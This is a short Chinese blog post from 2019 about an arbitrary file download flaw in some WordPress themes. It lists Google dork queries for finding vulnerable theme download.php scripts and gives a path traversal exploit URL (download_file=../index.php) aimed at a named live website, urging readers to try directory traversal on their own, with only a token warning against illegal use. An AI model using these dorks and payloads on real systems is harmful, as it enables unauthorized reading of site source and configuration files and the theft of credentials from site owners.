WordPress 文件下载漏洞

Google dork：inurl:"/wp-content/themes/liberator/inc/php/download.php"

exploit：https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php

google dork:

inurl:"/wp-content/themes/newspro2891/download.php"

inurl:"/wp-content/themes/cafesalivation/download.php"

inurl:"/wp-content/themes/duena/download.php"

可以尝试跨目录访问，碰下运气，稳一波

各位可以自行测试，请勿非法使用！！

posted @ 2019-08-03 12:31 APT-101 阅读(644) 评论(0) 编辑收藏举报

刷新页面返回顶部

APT-101